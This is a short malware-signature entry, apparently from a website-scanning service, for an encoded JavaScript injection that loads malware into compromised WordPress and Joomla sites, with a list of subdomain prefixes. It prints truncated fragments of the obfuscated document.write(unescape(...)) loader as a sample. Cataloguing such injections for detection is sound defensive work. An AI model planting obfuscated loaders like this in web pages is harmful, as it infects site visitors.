SiteCheck Signatures

malware-entry-mwjs222

Description: This encoded JavaScript loads malware from:

And some subdomains within it:
"vagi.","vain.","vale.","vars.","vary.","vasa.","vaut.",
"vavs.","viny.","viol.","vrow.","vugs.","vuln."

Affecting: Any web site (common on WordPress and Joomla) hosted at Rackspace, Mediatemple and Bluehost.

Malware dump:


document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%20%74..

;var st1 = 0;document.write(unescape('%3C%73%63%72%69%70%74...